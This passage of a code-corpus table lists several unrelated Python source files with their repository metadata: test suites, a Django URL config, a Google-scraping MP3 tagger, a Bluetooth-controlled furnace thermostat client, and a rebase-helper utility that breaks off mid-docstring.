| text (string, 6–947k chars) | repo_name (string, 5–100 chars) | path (string, 4–231 chars) | language (string, 1 class) | license (string, 15 classes) | size (int64, 6–947k) | score (float64, 0–0.34) |
|---|---|---|---|---|---|---|
# Make sure to update package.json, too!
version_info = (4, 3, 0)
__version__ = '.'.join(map(str, version_info))
|
unnikrishnankgs/va
|
venv/lib/python3.5/site-packages/nbformat/_version.py
|
Python
|
bsd-2-clause
| 113
| 0
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Author: Tim Henderson
#Email: tim.tadh@hackthology.com
#For licensing see the LICENSE file in the top level directory.
from predictive import parse
def t_expr_compound():
assert (4*3/2) == parse('4*3/2')
assert (4/2*3) == parse('4/2*3')
assert ((3+9)*4/8) == parse('(3+9)*4/8')
assert (((9-3)*(5-3))/2 + 2) == parse('((9-3)*(5-3))/2 + 2')
assert (5 * 4 / 2 - 10 + 5 - 2 + 3) == parse('5 * 4 / 2 - 10 + 5 - 2 + 3')
assert (5 / 4 * 2 + 10 - 5 * 2 / 3) == parse('5 / 4 * 2 + 10 - 5 * 2 / 3')
|
timtadh/PyOhio2011
|
t_predictive.py
|
Python
|
bsd-3-clause
| 562
| 0.007117
|
import urllib2
import eyed3
import mechanize
import os
from bs4 import BeautifulSoup as bs
import unicodedata as ud
import sys
import string
reload(sys)
sys.setdefaultencoding('utf-8')
class Song:
def __init__(self, keyword, filename, albumart, aaformat, dd='/home/praneet/Music/'):
self.info = keyword.split('@')
self.filename = os.path.join(dd, filename).encode('utf-8')
self.keyword = urllib2.quote(''.join(self.info))
self.albumart = albumart
self.aaformat = aaformat
self.album = ''
self.artist = string.capwords(self.info[1])
self.title = self.info[0]
self.feat = ' '
self.genre = 'Unknown'
self.dd = dd
self.fetchID3()
def fetchID3(self):
browser = mechanize.Browser()
browser.set_handle_robots(False)
browser.addheaders = [('User-agent','Mozilla')]
searchURL = "https://www.google.co.in/search?site=imghp&source=hp&biw=1414&bih=709&q="+urllib2.quote(self.title+' '+self.artist+' song')
html = browser.open(searchURL)
soup = bs(html, 'html.parser')
souplist = soup.findAll(attrs={'class':'_o0d'})
for i in range(1,len(souplist)):
if souplist[i].get_text().split(':')[0].lower() == 'album' or souplist[i].get_text().split(':')[0].lower() == 'movie':
self.album = souplist[i].get_text().split(':')[1]
print 'album ',souplist[i].get_text().split(':')[1]
elif souplist[i].get_text().split(':')[0].lower() == 'artist' or souplist[i].get_text().split(':')[0].lower() == 'artists':
self.artist = souplist[i].get_text().split(':')[1]
print 'artist ',souplist[i].get_text().split(':')[1]
elif souplist[i].get_text().split(':')[0].lower() == 'genre' or souplist[i].get_text().split(':')[0].lower() == 'genres':
self.genre = souplist[i].get_text().split(':')[1]
print 'genre ',souplist[i].get_text().split(':')[1]
elif souplist[i].get_text().split(':')[0].lower() == 'featured artist' or souplist[i].get_text().split(':')[0].lower() == 'featured artists':
self.feat = souplist[i].get_text().split(':')[1]
print 'featured artist ',souplist[i].get_text().split(':')[1]
else:
pass
self.fetchalbum()
def fetchalbum(self):
browser = mechanize.Browser()
browser.set_handle_robots(False)
browser.addheaders = [('User-agent','Mozilla')]
searchURL = "https://www.google.co.in/search?site=imghp&source=hp&biw=1414&bih=709&q="+urllib2.quote(self.title+' '+self.artist+' album name')
html = browser.open(searchURL)
soup = bs(html, 'html.parser')
for i in soup.findAll(attrs={'class':'_B5d'}):
if self.album == '':
self.album = i.get_text()
print self.album
break
if self.album == '':
if not self.info[2].isspace() and self.info[2] != '':
self.album = string.capwords(self.info[2])
else:
self.album = self.title + '- Single'
print 'album', self.album
def updateID3(self):
audiofile = eyed3.load(self.filename)
try:
audiofile.tag.artist = unicode(self.artist, "utf-8")
except:
audiofile.tag.artist = self.artist
try:
audiofile.tag.album = unicode(self.album, "utf-8")
except:
audiofile.tag.album = self.album
title = ''
if self.feat == ' ':
title = self.title
else:
title = self.title+' ft. '+self.feat
try:
audiofile.tag.title = unicode(title, "utf-8")
except:
audiofile.tag.title = title
try:
audiofile.tag.genre = unicode(self.genre, "utf-8")
except:
audiofile.tag.genre = self.genre
audiofile.tag.images.set(3, open(self.albumart,'rb').read(), 'image/'+self.aaformat)
audiofile.tag.save()
if not os.path.isfile(self.dd+title.rstrip()+'.mp3'):  # match the renamed filename below
os.rename(self.filename, self.dd+title.rstrip()+'.mp3')
else:
newTitle = raw_input('Similar file already exists, enter new file name: ')
os.rename(self.filename, self.dd+newTitle.rstrip()+'.mp3')
print 'update complete'
os.remove(self.albumart)
# newsong = Song('Rockabye','Rockabye.mp3', 'rockabye','rockabye album art.jpeg','jpeg')
# newsong.updateID3()
|
praneetmehta/FSMD
|
ID3update.py
|
Python
|
mit
| 3,922
| 0.031362
|
# -*- coding: utf-8 -*-
from __future__ import with_statement
from cms.api import create_page, create_title
from cms.apphook_pool import apphook_pool
from cms.appresolver import (applications_page_check, clear_app_resolvers,
get_app_patterns)
from cms.test_utils.testcases import CMSTestCase
from cms.test_utils.util.context_managers import SettingsOverride
from django.contrib.auth.models import User
from django.core.urlresolvers import clear_url_caches, reverse
import sys
APP_NAME = 'SampleApp'
APP_MODULE = "cms.test_utils.project.sampleapp.cms_app"
class ApphooksTestCase(CMSTestCase):
def setUp(self):
clear_app_resolvers()
clear_url_caches()
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
def tearDown(self):
clear_app_resolvers()
clear_url_caches()
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
def test_explicit_apphooks(self):
"""
Test explicit apphook loading with the CMS_APPHOOKS setting.
"""
apphooks = (
'%s.%s' % (APP_MODULE, APP_NAME),
)
with SettingsOverride(CMS_APPHOOKS=apphooks):
apphook_pool.clear()
hooks = apphook_pool.get_apphooks()
app_names = [hook[0] for hook in hooks]
self.assertEqual(len(hooks), 1)
self.assertEqual(app_names, [APP_NAME])
apphook_pool.clear()
def test_implicit_apphooks(self):
"""
Test implicit apphook loading with INSTALLED_APPS + cms_app.py
"""
apps = ['cms.test_utils.project.sampleapp']
with SettingsOverride(INSTALLED_APPS=apps, ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'):
apphook_pool.clear()
hooks = apphook_pool.get_apphooks()
app_names = [hook[0] for hook in hooks]
self.assertEqual(len(hooks), 1)
self.assertEqual(app_names, [APP_NAME])
apphook_pool.clear()
def test_apphook_on_root(self):
with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'):
apphook_pool.clear()
superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin')
page = create_page("apphooked-page", "nav_playground.html", "en",
created_by=superuser, published=True, apphook="SampleApp")
blank_page = create_page("not-apphooked-page", "nav_playground.html", "en",
created_by=superuser, published=True, apphook="", slug='blankapp')
english_title = page.title_set.all()[0]
self.assertEquals(english_title.language, 'en')
create_title("de", "aphooked-page-de", page, apphook="SampleApp")
self.assertTrue(page.publish())
self.assertTrue(blank_page.publish())
response = self.client.get(self.get_pages_root())
self.assertTemplateUsed(response, 'sampleapp/home.html')
response = self.client.get('/en/blankapp/')
self.assertTemplateUsed(response, 'nav_playground.html')
apphook_pool.clear()
def test_apphook_on_root_reverse(self):
with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'):
apphook_pool.clear()
superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin')
page = create_page("apphooked-page", "nav_playground.html", "en",
created_by=superuser, published=True, apphook="SampleApp")
create_title("de", "aphooked-page-de", page, apphook="SampleApp")
self.assertTrue(page.publish())
self.assertFalse(reverse('sample-settings').startswith('//'))
apphook_pool.clear()
def test_get_page_for_apphook(self):
with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.second_urls_for_apphook_tests'):
apphook_pool.clear()
superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin')
page = create_page("home", "nav_playground.html", "en",
created_by=superuser, published=True)
create_title('de', page.get_title(), page)
child_page = create_page("child_page", "nav_playground.html", "en",
created_by=superuser, published=True, parent=page)
create_title('de', child_page.get_title(), child_page)
child_child_page = create_page("child_child_page", "nav_playground.html",
"en", created_by=superuser, published=True, parent=child_page, apphook='SampleApp')
create_title("de", child_child_page.get_title(), child_child_page, apphook='SampleApp')
child_child_page.publish()
# publisher_public is set to draft on publish, issue with onetoone reverse
child_child_page = self.reload(child_child_page)
en_title = child_child_page.publisher_public.get_title_obj('en')
path = reverse('en:sample-settings')
request = self.get_request(path)
request.LANGUAGE_CODE = 'en'
attached_to_page = applications_page_check(request, path=path[1:]) # strip leading slash
self.assertEquals(attached_to_page.pk, en_title.page.pk)
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/home.html')
self.assertContains(response, en_title.title)
de_title = child_child_page.publisher_public.get_title_obj('de')
path = reverse('de:sample-settings')
request = self.get_request(path)
request.LANGUAGE_CODE = 'de'
attached_to_page = applications_page_check(request, path=path[4:]) # strip leading slash and language prefix
self.assertEquals(attached_to_page.pk, de_title.page.pk)
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/home.html')
self.assertContains(response, de_title.title)
apphook_pool.clear()
def test_include_urlconf(self):
with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.second_urls_for_apphook_tests'):
apphook_pool.clear()
superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin')
page = create_page("home", "nav_playground.html", "en",
created_by=superuser, published=True)
create_title('de', page.get_title(), page)
child_page = create_page("child_page", "nav_playground.html", "en",
created_by=superuser, published=True, parent=page)
create_title('de', child_page.get_title(), child_page)
child_child_page = create_page("child_child_page", "nav_playground.html",
"en", created_by=superuser, published=True, parent=child_page, apphook='SampleApp')
create_title("de", child_child_page.get_title(), child_child_page, apphook='SampleApp')
child_child_page.publish()
path = reverse('extra_second')
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/extra.html')
self.assertContains(response, "test included urlconf")
path = reverse('extra_first')
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/extra.html')
self.assertContains(response, "test urlconf")
path = reverse('de:extra_first')
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/extra.html')
self.assertContains(response, "test urlconf")
path = reverse('de:extra_second')
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/extra.html')
self.assertContains(response, "test included urlconf")
apphook_pool.clear()
def test_apphook_breaking_under_home_with_new_path_caching(self):
with SettingsOverride(CMS_MODERATOR=False, CMS_PERMISSION=False):
home = create_page("home", "nav_playground.html", "en", published=True)
child = create_page("child", "nav_playground.html", "en", published=True, parent=home)
# not-home is what breaks stuff, because it contains the slug of the home page
not_home = create_page("not-home", "nav_playground.html", "en", published=True, parent=child)
create_page("subchild", "nav_playground.html", "en", published=True, parent=not_home, apphook='SampleApp')
urlpatterns = get_app_patterns()
resolver = urlpatterns[0]
url = resolver.reverse('sample-root')
self.assertEqual(url, 'child/not-home/subchild/')
|
hzlf/openbroadcast
|
website/cms/tests/apphooks.py
|
Python
|
gpl-3.0
| 9,529
| 0.006716
|
from django.conf.urls import patterns, url, include
from .views import GalleryListView, GalleryDetailView
urlpatterns = patterns("",
url(
regex=r"^gallery_list/$",
view=GalleryListView.as_view(),
name="gallery_list",
),
url(
regex=r"^gallery/(?P<pk>\d+)/$",
view=GalleryDetailView.as_view(),
name="gallery_detail",
),
)
|
ilendl2/chrisdev-cookiecutter
|
{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/photos/urls.py
|
Python
|
bsd-3-clause
| 387
| 0.002584
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Flag related helpers for sole tenancy related commands."""
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.compute import scope as compute_scope
SOLE_TENANCY_HOST_TYPE_RESOLVER = compute_flags.ResourceResolver.FromMap(
'sole tenancy host type', {
compute_scope.ScopeEnum.ZONE: 'compute.hostTypes'})
|
Sorsly/subtle
|
google-cloud-sdk/lib/googlecloudsdk/command_lib/compute/sole_tenancy/sole_tenancy_hosts/flags.py
|
Python
|
mit
| 967
| 0
|
import unittest, time, sys, re
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_nn, h2o_cmd, h2o_browse as h2b, h2o_import as h2i, h2o_gbm
def write_syn_dataset(csvPathname, rowCount, rowDataTrue, rowDataFalse, outputTrue, outputFalse):
dsf = open(csvPathname, "w+")
for i in range(int(rowCount/2)):
dsf.write(rowDataTrue + ',' + outputTrue + "\n")
for i in range(int(rowCount/2)):
dsf.write(rowDataFalse + ',' + outputFalse + "\n")
dsf.close()
class test_NN_twovalues(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
# fails with 3
global SEED
SEED = h2o.setup_random_seed()
h2o.init(1, java_heap_GB=4)
# h2b.browseTheCloud()
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud(h2o.nodes)
def test_DeepLearning_twovalues(self):
SYNDATASETS_DIR = h2o.make_syn_dir()
csvFilename = "syn_twovalues.csv"
csvPathname = SYNDATASETS_DIR + '/' + csvFilename
rowDataTrue = "1, 0, 65, 1, 2, 1, 1, 4, 1, 4, 1, 4"
rowDataFalse = "0, 1, 0, -1, -2, -1, -1, -4, -1, -4, -1, -4"
twoValueList = [
('A','B',0, 14),
('A','B',1, 14),
(0,1,0, 12),
(0,1,1, 12),
(0,1,'NaN', 12),
(1,0,'NaN', 12),
(-1,1,0, 12),
(-1,1,1, 12),
(-1e1,1e1,1e1, 12),
(-1e1,1e1,-1e1, 12),
]
trial = 0
for (outputTrue, outputFalse, case, coeffNum) in twoValueList:
write_syn_dataset(csvPathname, 20,
rowDataTrue, rowDataFalse, str(outputTrue), str(outputFalse))
start = time.time()
hex_key = csvFilename + "_" + str(trial)
model_key = 'trial_' + str(trial) + '.hex'
validation_key = hex_key
parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=hex_key)
print "using outputTrue: %s outputFalse: %s" % (outputTrue, outputFalse)
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'])
print "\n" + csvPathname, \
" numRows:", "{:,}".format(inspect['numRows']), \
" numCols:", "{:,}".format(inspect['numCols'])
response = inspect['numCols']
response = 'C' + str(response)
kwargs = {
'ignored_cols' : None,
'response' : response,
'classification' : 1,
'activation' : 'Tanh',
#'input_dropout_ratio' : 0.2,
'hidden' : '113,71,54',
'rate' : 0.01,
'rate_annealing' : 1e-6,
'momentum_start' : 0,
'momentum_stable' : 0,
'l1' : 0.0,
'l2' : 1e-6,
'seed' : 80023842348,
'loss' : 'CrossEntropy',
#'max_w2' : 15,
'initial_weight_distribution' : 'UniformAdaptive',
#'initial_weight_scale' : 0.01,
'epochs' : 100,
'destination_key' : model_key,
'validation' : hex_key,
}
timeoutSecs = 60
start = time.time()
h2o_cmd.runDeepLearning(parseResult=parseResult, timeoutSecs=timeoutSecs, **kwargs)
print "trial #", trial, "Deep Learning end on ", csvFilename, ' took', time.time() - start, 'seconds'
#### Now score using the model, and check the validation error
expectedErr = 0.00
relTol = 0.01
predict_key = 'Predict.hex'
kwargs = {
'data_key': validation_key,
'destination_key': predict_key,
'model_key': model_key
}
predictResult = h2o_cmd.runPredict(timeoutSecs=timeoutSecs, **kwargs)
h2o_cmd.runInspect(key=predict_key, verbose=True)
kwargs = {
}
predictCMResult = h2o.nodes[0].predict_confusion_matrix(
actual=validation_key,
vactual=response,
predict=predict_key,
vpredict='predict',
timeoutSecs=timeoutSecs, **kwargs)
cm = predictCMResult['cm']
print h2o_gbm.pp_cm(cm)
actualErr = h2o_gbm.pp_cm_summary(cm)/100.
print "actual classification error:" + format(actualErr)
print "expected classification error:" + format(expectedErr)
denom = expectedErr if expectedErr else 1.0  # guard: expectedErr is 0.0, so the bare relative-error division raised ZeroDivisionError
if actualErr != expectedErr and abs((expectedErr - actualErr)/denom) > relTol:
raise Exception("Scored classification error of %s is not within %s %% relative error of %s" %
(actualErr, float(relTol)*100, expectedErr))
trial += 1
if __name__ == '__main__':
h2o.unit_main()
|
rowhit/h2o-2
|
py/testdir_single_jvm/test_NN2_twovalues.py
|
Python
|
apache-2.0
| 5,312
| 0.012236
|
#! /usr/bin/env python
import bluetooth
import subprocess
import re
import time
import string
import pywapi
import httplib
import ast
import socket
import ConfigParser
import io
from datetime import datetime, date
from time import mktime
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
from ssl import SSLError
from socket import error as SocketError
class Config:
"""Holds basic settings as well as current state"""
def __init__(self):
c = ConfigParser.RawConfigParser()
c.read('.furnace.cfg')
self.bluetooth_addr = c.get('relay', 'bluetooth_addr')
self.bluetooth_port = c.getint('relay', 'bluetooth_port')
self.relay_channels = c.getint('relay', 'channels')
self.primary_furnace = c.getint('relay', 'primary_furnace')
self.base_url = c.get('url', 'base_url')
self.secret = c.get('url', 'secret')
self.zip_code = c.get('house', 'zip_code')
self.room = c.get('house', 'room')
self.home_status = ''
self.mode = ''
self.last_time_home=0
self.indoor_temp_target=0
self.indoor_temp_target_dict={}
self.default_temp_day=c.getint('default_temp', 'day')
self.default_temp_night=c.getint('default_temp', 'night')
self.default_temp_away=c.getint('default_temp', 'away')
presence_devices=c.items('devices')
presence_devices_wifi=[]
for device in presence_devices:
presence_devices_wifi.append(dict(owner=device[0], ip_address=device[1], timestamp=0))
self.presence_devices_wifi = presence_devices_wifi
def write(self):
# persist the defaults that getTarget() may update; note RawConfigParser.write()
# takes an open file object, not a filename string
c = ConfigParser.RawConfigParser()
c.read('.furnace.cfg')
for k in ('day', 'night', 'away'):
c.set('default_temp', k, getattr(self, 'default_temp_' + k))
c.write(open('.furnace.cfg', 'w'))
def ping(ip_address):
"""Determines if a certain IP address is currently used on our network
(to determine device presence)."""
received = -1  # default so the return below is always defined, even if nmap fails
try:
ping = subprocess.Popen(["nmap", "-sP", ip_address], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, error = ping.communicate()
if out:
try:
received=int(re.findall(r"(\d+) host up", out)[0])
except:
received=0
else:
print 'No response from nmap'
except subprocess.CalledProcessError:
print "Couldn't get a ping"
return received
def getTarget(config, indoor_temp):
"""Defines the target temperature and current operating mode (target temp,
day default, night default)."""
now = datetime.now()
home_status = config.home_status
indoor_temp_target_dict = config.indoor_temp_target_dict
print "%s:%s" % (string.zfill(now.hour,2), string.zfill(now.minute,2))
utimestamp=mktime(datetime.now().utctimetuple())
default_temp_day = config.default_temp_day
default_temp_night = config.default_temp_night
default_temp_away = config.default_temp_away
default_temp_mode = ''
config.mode = ''
try:
default_temp = indoor_temp_target_dict['default_temperature']
default_temp_mode = indoor_temp_target_dict['default_temperature_mode']
target_timestamp = indoor_temp_target_dict['date'] + indoor_temp_target_dict['start_minutes'] * 60
target_end_timestamp = indoor_temp_target_dict['date'] + indoor_temp_target_dict['start_minutes'] * 60 + indoor_temp_target_dict['held_minutes'] * 60
if target_end_timestamp > utimestamp:
time_to_target = int(round((target_timestamp - utimestamp) / 60))
time_to_end = int(round((target_end_timestamp - utimestamp) / 60))
if target_timestamp > utimestamp:
print "we've got a target coming up in %s minutes" % time_to_target
# we need about 2 minutes per degree Celsius
if time_to_target <= 0 or time_to_target * 2 <= indoor_temp_target_dict['temperature'] - indoor_temp:
config.indoor_temp_target = indoor_temp_target_dict['temperature']
config.mode = 'timer'
print "setting target to %s degrees Celsius for %s more minutes" % (indoor_temp_target_dict['temperature'], time_to_end)
except KeyError:
print "no target set"
if config.mode != 'timer':
# TODO: make the time periods configurable in the interface
if datetime.today().isoweekday() <= 5:
# Week day
if home_status=='away':
config.mode='away'
if config.mode == default_temp_mode and default_temp != default_temp_away:
config.indoor_temp_target = default_temp
print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
config.default_temp_away = default_temp
else:
config.indoor_temp_target=default_temp_away
elif (0 <= now.hour < 7) and home_status=='home':
config.mode='night'
if config.mode == default_temp_mode and default_temp != default_temp_night:
config.indoor_temp_target = default_temp
print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
config.default_temp_night = default_temp
else:
config.indoor_temp_target = default_temp_night
elif 7 <= now.hour and home_status=='home':
config.mode='day'
if config.mode == default_temp_mode and default_temp != default_temp_day:
config.indoor_temp_target = default_temp
print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
config.default_temp_day = default_temp
else:
config.indoor_temp_target = default_temp_day
else:
# Weekend
if home_status=='away':
config.mode='away'
if config.mode == default_temp_mode and default_temp != default_temp_away:
config.indoor_temp_target = default_temp
print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
config.default_temp_away = default_temp
else:
config.indoor_temp_target=default_temp_away
elif (0 <= now.hour < 8) and home_status=='home':
config.mode='night'
if config.mode == default_temp_mode and default_temp != default_temp_night:
config.indoor_temp_target = default_temp
print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
config.default_temp_night = default_temp
else:
config.indoor_temp_target = default_temp_night
elif 8 <= now.hour and home_status=='home':
config.mode='day'
if config.mode == default_temp_mode and default_temp != default_temp_day:
config.indoor_temp_target = default_temp
print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
config.default_temp_day = default_temp
else:
config.indoor_temp_target = default_temp_day
config.write()  # call the method; the bare "config.write" was a no-op
return config
def checkPresence(config):
"""Pings all configured devices to determine who's at home"""
no_of_users_at_home=0
last_time_home=config.last_time_home
now = mktime(datetime.now().utctimetuple())
for device in config.presence_devices_wifi:
if device['timestamp'] >= now - 600:
print "Assuming %s is still at home" % device['owner']
no_of_users_at_home+=1
if no_of_users_at_home == 0:
for device in config.presence_devices_wifi:
if ping(device['ip_address']) > 0:
print "%s seems to be at home" % device['owner']
device['timestamp']=now
last_time_home=now
no_of_users_at_home+=1
if no_of_users_at_home > 0:
home_status='home'
else:
home_status='away'
else:
home_status='home'
return last_time_home, home_status, config.presence_devices_wifi
def btConnection(config, sendchar = 'n', close_after = True):
"""Creates a bluetooth connection to the relay, sends a command and returns
the result"""
print("opening Bluetooth connection")
i = 1
timed_out = False
while True:
try:
furnace_socket=bluetooth.BluetoothSocket( bluetooth.RFCOMM )
if furnace_socket.getpeername()[0] != config.bluetooth_addr:
furnace_socket.connect((config.bluetooth_addr, config.bluetooth_port))
furnace_socket.settimeout(10)
print "Bluetooth connected"
furnace_socket.send(sendchar+'[')
response_byte = furnace_socket.recv(1)
break
except bluetooth.btcommon.BluetoothError as error:
print(".")
print error
time.sleep(1)
i += 1
if i >= 30 and sendchar != '':
timed_out = True
break
if close_after:
print("closing Bluetooth connection")
furnace_socket.close()
if not timed_out:
response_bin = bin(ord(response_byte))[2:].zfill(config.relay_channels)
response_bit_list = map(int, list(response_bin))
response_bit_list.reverse()
return response_bit_list
else:
return False
def turnOnFurnace(config, furnace_no):
"""turns on a furnace using the bluetooth relay"""
channels = config.relay_channels
if furnace_no <= channels:
relaychar = chr(101+furnace_no)
elif furnace_no == channels + 1:
relaychar = 'd'
else:
print("Error: no such furnace!")
#raise
furnace_state = btConnection(config, relaychar, close_after=False)
if furnace_state:
if furnace_state[furnace_no]:
print("furnace %s turned on") % furnace_no
elif sum(furnace_state) == channels:
print("all furnaces turned on")
else:
print("Error: furnace has not been turned on!")
#raise
else:
print("Error: furnace has not been turned on!")
#raise
return furnace_state
def turnOffFurnace(config, furnace_no):
"""turns off a furnace using the bluetooth relay"""
channels = config.relay_channels
if furnace_no <= channels:
relaychar = chr(111+furnace_no)
elif furnace_no == channels + 1:
relaychar = 'n'
else:
print("Error: no such furnace!")
#raise
furnace_state = btConnection(config, relaychar, close_after=True)
if not furnace_state:
print("Error: could not read relay state!")
elif furnace_state[furnace_no]:
print("Error: furnace has not been turned off!")
#raise
elif sum(furnace_state) == 0:
print("all furnaces turned off")
else:
print("furnace %s turned off" % furnace_no)
return furnace_state
def checkOutdoorTemp(zip_code):
"""Gets outdoor temperature for our ZIP code from Yahoo!"""
try:
yahoo_com_result = pywapi.get_weather_from_yahoo( zip_code, units = 'metric' )
outdoor_temperature = int(yahoo_com_result['condition']['temp'])
except (KeyError, AttributeError, httplib.BadStatusLine):
outdoor_temperature = 0
return outdoor_temperature
def checkIndoorTemp(config):
"""Gets indoor temperature from USB thermometer using command line tool"""
# repeat forever - temper is very flaky
tries = 0
while True:
tries += 1
try:
indoor_temp = float(subprocess.Popen("/usr/local/bin/temper", stdout=subprocess.PIPE).communicate()[0])
break
except ValueError:
print "Oops! Did not get a temperature. Trying again..."
if tries == 10:
# better turn off the furnace, probably an issue with the USB device
turnOffFurnace(config, config.primary_furnace)
return indoor_temp
def transmit(config, outdoor_temp, indoor_temp):
"""Transmits the current state to the server for reporting and gets targets
set in the web GUI (if any exist)"""
furnace_state=config.furnace_state
primary_furnace=config.primary_furnace
indoor_temp_target_dict={}
# round up or down to half degrees C
rounded_indoor_temp = round(indoor_temp*10/5)/2
print "It is %s degrees Celsius - target is %s (outdoors it's %s degrees Celsius)" % (rounded_indoor_temp, config.indoor_temp_target, outdoor_temp)
values = { 't' : indoor_temp,
'g' : config.indoor_temp_target,
'h' : config.home_status,
'f' : furnace_state[primary_furnace],
'r' : config.room,
's' : config.secret,
'o' : outdoor_temp,
'm' : config.mode }
try:
data = urlencode(values)
req = Request(config.base_url, data)
response = urlopen(req)
indoor_temp_target_dict = ast.literal_eval(response.read())
except HTTPError as e:
print 'The server couldn\'t fulfill the request.'
print 'Error code: ', e.code
except URLError as e:
print 'We failed to reach a server.'
print 'Reason: ', e.reason
except SSLError as e:
print 'We had an SSL error.'
except SocketError as e:
print 'Socket error'
if rounded_indoor_temp < config.indoor_temp_target and furnace_state[ primary_furnace ] == 0:
print "it is too cold"
furnace_state = turnOnFurnace(config, primary_furnace)
elif rounded_indoor_temp >= config.indoor_temp_target and furnace_state[ primary_furnace ] == 1:
print "it is warm enough"
furnace_state = turnOffFurnace(config, primary_furnace)
elif rounded_indoor_temp < config.indoor_temp_target and furnace_state[ primary_furnace ] == 1:
print "heating up"
elif rounded_indoor_temp >= config.indoor_temp_target and furnace_state[ primary_furnace ] == 0:
print "letting it cool down"
else:
print "weird state"
return furnace_state, indoor_temp_target_dict
def loop():
"""Main part of the client that repeats every 60 seconds"""
config = Config()
config.furnace_state = btConnection(config, 'n', close_after=False)
while True:
beforetime = mktime(datetime.now().utctimetuple())
config.last_time_home, config.home_status, config.presence_devices_wifi = checkPresence(config)
outdoor_temp=checkOutdoorTemp(config.zip_code)
indoor_temp=checkIndoorTemp(config)
config = getTarget(config, indoor_temp)
config.furnace_state, config.indoor_temp_target_dict=transmit(config, outdoor_temp, indoor_temp)
aftertime = mktime(datetime.now().utctimetuple())
if aftertime - beforetime >= 60:
sleeptime = 0
else:
sleeptime = 60 - (aftertime - beforetime)
time.sleep(sleeptime) # Delay the rest of 1 minute (60 seconds)
loop()
|
040medien/furnaceathome
|
furnace_client.py
|
Python
|
gpl-2.0
| 15,051
| 0.011694
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_dressed_binayre_ruffian_trandoshan_male_01.iff"
result.attribute_template_id = 9
result.stfName("npc_name","trandoshan_base_male")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
anhstudios/swganh
|
data/scripts/templates/object/mobile/shared_dressed_binayre_ruffian_trandoshan_male_01.py
|
Python
|
mit
| 472
| 0.04661
|
# -*- coding: utf-8 -*-
#
# This tool helps you rebase your package to the latest version
# Copyright (C) 2013-2019 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Authors: Petr Hráček <phracek@redhat.com>
# Tomáš Hozza <thozza@redhat.com>
# Nikola Forró <nforro@redhat.com>
# František Nečas <fifinecas@seznam.cz>
import logging
from typing import cast
from rebasehelper.logger import CustomLogger
logger: CustomLogger = cast(CustomLogger, logging.getLogger(__name__))
class InputHelper:
"""Class for command line interaction with the user."""
@staticmethod
def strtobool(message):
"""Converts a user message to a corresponding truth value.
This method is a replacement for the deprecated strtobool from distutils;
its behaviour remains the same.
Args:
message (str): Message to evaluate.
Returns:
bool: True on 'y', 'yes', 't', 'true', 'on' and '1'.
False on 'n', 'no', 'f', 'false', 'off' and '0'.
Raises:
ValueError: On any other value.
"""
message = message.lower()
if message in ('y', 'yes', 't', 'true', 'on', '1'):
return True
elif message in ('n', 'no', 'f', 'false', 'off', '0'):
return False
raise ValueError('No conversion to truth value for "{}"'.format(message))
@classmethod
def get_message(cls, message, default_yes=True, any_input=False):
"""Prompts a user with yes/no message and gets the response.
Args:
message (str): Prompt string.
default_yes (bool): If the default value should be YES.
